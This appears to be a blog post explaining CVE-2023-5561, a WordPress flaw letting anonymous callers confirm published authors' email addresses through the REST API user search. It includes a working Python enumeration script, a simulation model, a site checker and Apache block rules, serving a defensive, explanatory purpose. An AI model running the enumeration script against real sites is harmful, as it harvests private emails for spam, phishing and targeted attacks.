WordPress powers a huge part of the internet, but even the biggest platforms slip up sometimes. One example is CVE-2023-5561, a vulnerability in WordPress versions before 6.3.2 that was disclosed in October 2023. This bug lets anyone, logged in or not, confirm the email addresses of users who have published posts on your site through an oracle-style attack against the REST API's user search.

In this article, I’ll break down how this issue works, show some proof-of-concept (PoC) code, and share key references so you can read more if you want.

What is CVE-2023-5561?

WordPress ships a REST API for reading and modifying site data over HTTP. It is the same API that powers the Block Editor and many modern site features. The public users endpoint lists users who have published posts and exposes only public fields such as id, name and slug; private fields like the email address are never returned to anonymous callers.

But in affected versions, the endpoint's search parameter was handed straight to WP_User_Query, which picks the database columns to search from the shape of the term: a term containing @ is matched against the user_email column. Nothing restricted that for unauthenticated requests.

So, to find out whether someone's email (say, _bob@example.com_) belongs to a published author on a site, you ask the API: does a user matching this term exist? The email is not in the response, but a non-empty result list tells you it matched. Repeat for each candidate address and you have confirmed emails one by one.

This kind of trick is called an “Oracle” attack—not because it’s got anything to do with the Oracle corporation, but because you get “yes or no” answers while probing for data you shouldn’t see.

How the Attack Works

1. Send a GET request to the REST API's users endpoint with the candidate email as the search term.
2. Look at the response. If the JSON array contains a user, that email belongs to a user who has published at least one post; an empty array means no match.
3. Repeat with a list of possible emails (e.g., common addresses, or emails from a previous data breach) to fish for matches. Because the endpoint wraps the term in wildcards (a substring match), a fragment such as @example.com returns every published author at that domain in one request.

The API endpoint at play is /wp-json/wp/v2/users?search=SEARCH_TERM (the same route is also reachable without pretty permalinks as /?rest_route=/wp/v2/users&search=SEARCH_TERM). The bug is that unauthenticated (not logged in) users could filter users by email because the controller placed no restriction on which columns the search term was matched against; the 6.3.2 fix limits searches from callers without the list_users capability to public columns, so user_email is no longer searched.
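To make the mechanism concrete, here is an added Python model of the server-side behaviour. It is not WordPress code and not the author's. The column-selection rules paraphrase WP_User_Query (a term containing @ is matched against user_email; after 6.3.2 unauthenticated searches never touch that column; the exact post-fix column list is simplified here), the substring match mirrors the REST controller wrapping the term in wildcards, and the USERS table is constructed for the demo.

```python
# Added example: a simplified, stand-alone model of how the WordPress users
# endpoint chose which columns to search before and after 6.3.2.
# NOT WordPress code; column rules are paraphrased, the user table is constructed.

EMAIL_COLUMN = "user_email"
# Columns WP_User_Query searches when the term gives no other hint (pre-patch default).
DEFAULT_COLUMNS = ["user_login", "user_url", "user_email", "user_nicename", "display_name"]
# Columns the 6.3.2 fix allows for callers without the list_users capability
# (simplified; the point is that user_email is never among them).
PUBLIC_COLUMNS = ["user_login", "user_nicename", "display_name"]

# Constructed sample user table. The public endpoint only lists authors with
# published posts, which is what makes this an author-email oracle.
USERS = [
    {"ID": 1, "user_login": "admin", "user_nicename": "admin", "display_name": "Site Admin",
     "user_email": "admin@example.com", "user_url": "", "has_published_posts": True},
    {"ID": 2, "user_login": "bob", "user_nicename": "bob", "display_name": "Bob",
     "user_email": "bob@example.com", "user_url": "https://bob.example", "has_published_posts": True},
    {"ID": 3, "user_login": "jane", "user_nicename": "jane", "display_name": "Jane",
     "user_email": "jane@example.org", "user_url": "", "has_published_posts": True},
    {"ID": 4, "user_login": "lurker", "user_nicename": "lurker", "display_name": "Lurker",
     "user_email": "lurker@example.com", "user_url": "", "has_published_posts": False},
]


def search_columns(term, can_list_users, patched):
    """Pick the columns a search term is matched against."""
    if patched and not can_list_users:
        # Post-6.3.2: an anonymous search is confined to public columns.
        return PUBLIC_COLUMNS
    # Pre-6.3.2 (or a privileged caller): WP_User_Query decides from the term's shape.
    if "@" in term:
        return [EMAIL_COLUMN]
    if term.isdigit():
        return ["user_login", "ID"]
    if term.lower().startswith(("http://", "https://")):
        return ["user_url"]
    return DEFAULT_COLUMNS


def rest_user_search(term, can_list_users=False, patched=False):
    """Model GET /wp-json/wp/v2/users?search=<term>; returns the public records that match."""
    columns = search_columns(term, can_list_users, patched)
    # The controller wraps the term in '*...*', i.e. LIKE '%term%': a substring match.
    needle = term.lower()
    hits = []
    for user in USERS:
        if not (user["has_published_posts"] or can_list_users):
            continue  # anonymous callers only ever see published authors
        if any(needle in str(user[col]).lower() for col in columns):
            # Only public fields come back; the email itself is never in the response.
            hits.append({"id": user["ID"], "name": user["display_name"], "slug": user["user_nicename"]})
    return hits


def email_exists(term, patched=False):
    """The oracle: a non-empty result means some published author's email matched."""
    return len(rest_user_search(term, can_list_users=False, patched=patched)) > 0


if __name__ == "__main__":
    for email in ["admin@example.com", "bob@example.com", "lurker@example.com", "nobody@example.com"]:
        print(f"{email:22} vulnerable={email_exists(email)}  patched={email_exists(email, patched=True)}")
    # A bare domain fragment works too, because the match is a substring match.
    print("@example.com ->", [u["slug"] for u in rest_user_search("@example.com")])
```

Note how lurker@example.com is invisible even on the vulnerable model: the endpoint hides users without published posts, so the oracle only ever confirms authors. On the patched model the same probes return an empty list, which is exactly what a site with no matching author returns, a point that matters when you test your own site.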

Here's a basic Python script that demonstrates this:

import requests

WORDPRESS_API = 'https://targetwebsite.com/wp-json/wp/v2/users'

def check_email(email):
    """Return True if some published author's email matches the search term."""
    params = {'search': email}
    # A timeout keeps the script from hanging on a slow or rate-limiting host.
    response = requests.get(WORDPRESS_API, params=params, timeout=10)
    if response.status_code != 200:
        # 401/403 usually means the users listing is restricted; that is not a "no match".
        print(f"{email}: unexpected HTTP {response.status_code}")
        return None
    users = response.json()
    # The email itself is never returned; a non-empty array is the oracle's "yes".
    if users:
        print(f"User found for email: {email} (slug: {users[0].get('slug')})")
        return True
    print(f"No user for {email}")
    return False

# Try it with a list of candidate emails
emails = [
    "admin@example.com",
    "bob@example.com",
    "jane@example.org"
]

for email in emails:
    check_email(email)

Warning: This is for educational and defensive research purposes only. Do not scan any system you don’t have permission to test.

What’s the Risk?

- Privacy: Your authors’ emails can be harvested and added to spam lists or used in phishing attempts.
- Enumeration: Attackers can position themselves for future attacks (like targeted brute force, social engineering, or password reset attempts).
- No login required: Anyone can do this—no login, no special tools. Just a web browser or a simple script is enough.

Official References

- WordPress Security Release Post
- CVE Record on NVD
- Wordfence Blog: Under the Hood of CVE-2023-5561

Did You Patch?

If you’re running WordPress, update to at least 6.3.2 ASAP. You can do this from the dashboard—just check under “Updates.” Most reputable managed hosts will do this for you.
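How to tell whether your own site is still exposed, as an added example that is not part of the original post (standard library only). A single probe cannot distinguish a patched site from an email that simply has no author, since both return an empty array, so the check uses a control email you know belongs to a published author. The responses in SAMPLE_RESPONSES are constructed for the demo; fetch() is the live helper for a site you are authorised to test, and the demo never calls it. The block also builds the query-string form of the route, which any path-based block must cover as well.

```python
# Added example: interpret the REST API's answers to decide whether a site is
# still exposed to CVE-2023-5561. Not from the original post; sample responses
# below are constructed, and the base URL is a placeholder.
import json
import urllib.error
import urllib.parse
import urllib.request


def classify(status, body):
    """Turn one HTTP response into an oracle verdict."""
    if status in (401, 403):
        return "blocked"        # users listing restricted (plugin, WAF or auth required)
    if status != 200:
        return "unexpected"
    try:
        data = json.loads(body)
    except ValueError:
        return "unexpected"     # not JSON: probably a WAF page or a broken install
    if isinstance(data, list):
        return "match" if data else "no_match"
    return "unexpected"


def assess(control_verdict, probe_verdicts):
    """
    control_verdict: verdict for an email you KNOW belongs to a published author.
    probe_verdicts:  {email: verdict} for the addresses being checked.
    Without the control you cannot tell "patched" from "no author has that email".
    """
    if control_verdict == "blocked":
        return "endpoint blocked", []
    if control_verdict != "match":
        return "not exposed (patched, or the control author has no published posts)", []
    confirmed = [email for email, verdict in probe_verdicts.items() if verdict == "match"]
    return "VULNERABLE: email search works unauthenticated", confirmed


def users_url(base, email, pretty=True):
    """Both forms reach the same endpoint; a block on the /wp-json path alone misses the second."""
    q = urllib.parse.quote(email, safe="")
    if pretty:
        return f"{base}/wp-json/wp/v2/users?search={q}"
    return f"{base}/?rest_route=/wp/v2/users&search={q}"


def fetch(url, timeout=10):
    """Live probe helper. Only use it against a site you are authorised to test."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-5561-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# Constructed responses standing in for a live site (no network needed).
SAMPLE_RESPONSES = {
    "author@example.com": (200, '[{"id":2,"name":"Bob","slug":"bob"}]'),   # the control
    "bob@example.com":    (200, '[{"id":2,"name":"Bob","slug":"bob"}]'),
    "nobody@example.com": (200, "[]"),
    "waf@example.com":    (403, "<html>Forbidden</html>"),
}


def run_demo():
    """Assess the constructed site: control matches, so it is vulnerable."""
    control = classify(*SAMPLE_RESPONSES["author@example.com"])
    probes = {e: classify(*SAMPLE_RESPONSES[e]) for e in ("bob@example.com", "nobody@example.com")}
    return assess(control, probes)


if __name__ == "__main__":
    print(users_url("https://targetwebsite.com", "bob@example.com"))
    print(users_url("https://targetwebsite.com", "bob@example.com", pretty=False))
    print(run_demo())
```

For a live check, replace the constructed responses with fetch(users_url(base, email)) for the control and each probe, and run the same two URL forms: if the pretty path is blocked but the rest_route form still returns a match, the mitigation is incomplete.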

If you absolutely cannot update right now (not recommended!), restrict unauthenticated access to
/wp-json/wp/v2/users in the meantime. Two things to get right: the endpoint is a rewritten URL handled by index.php, so a <FilesMatch> block does nothing (FilesMatch matches file names on disk, not request paths), and WordPress also serves the same route through the query-string form /?rest_route=/wp/v2/users. On Apache with mod_rewrite, a rule in .htaccess placed before the WordPress rewrite rules covers both forms (this assumes WordPress is installed at the site root):

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/wp-json/wp/v2/users [NC,OR]
RewriteCond %{QUERY_STRING} rest_route=(/|%2F)wp(/|%2F)v2(/|%2F)users [NC]
RewriteRule .* - [F,L]

This blocks the endpoint for everyone, including logged-in editors whose author picker relies on it, so treat it as a stopgap. A narrower workaround is a small must-use plugin that hooks the user_search_columns filter and removes user_email from the searched columns when the current user lacks the list_users capability, which is essentially what 6.3.2 does. Or use a security plugin to limit REST API access.

Conclusion

CVE-2023-5561 might seem simple, but it’s a great example of the risks that come with APIs. When building or hosting platforms, it’s crucial to guard private data—even if it’s just a little piece like an email address. Attackers will use every clue they can get.

If you run a WordPress site, update now, check your privacy settings, and stay up to date with the latest security news.

Stay safe, and keep your WordPress patched!

Further reading:
- Complete WordPress REST API Reference
- How to Limit API Access in WordPress – WPBeginner


Timeline

Published on: 10/16/2023 20:15:18 UTC
Last modified on: 11/20/2023 23:15:06 UTC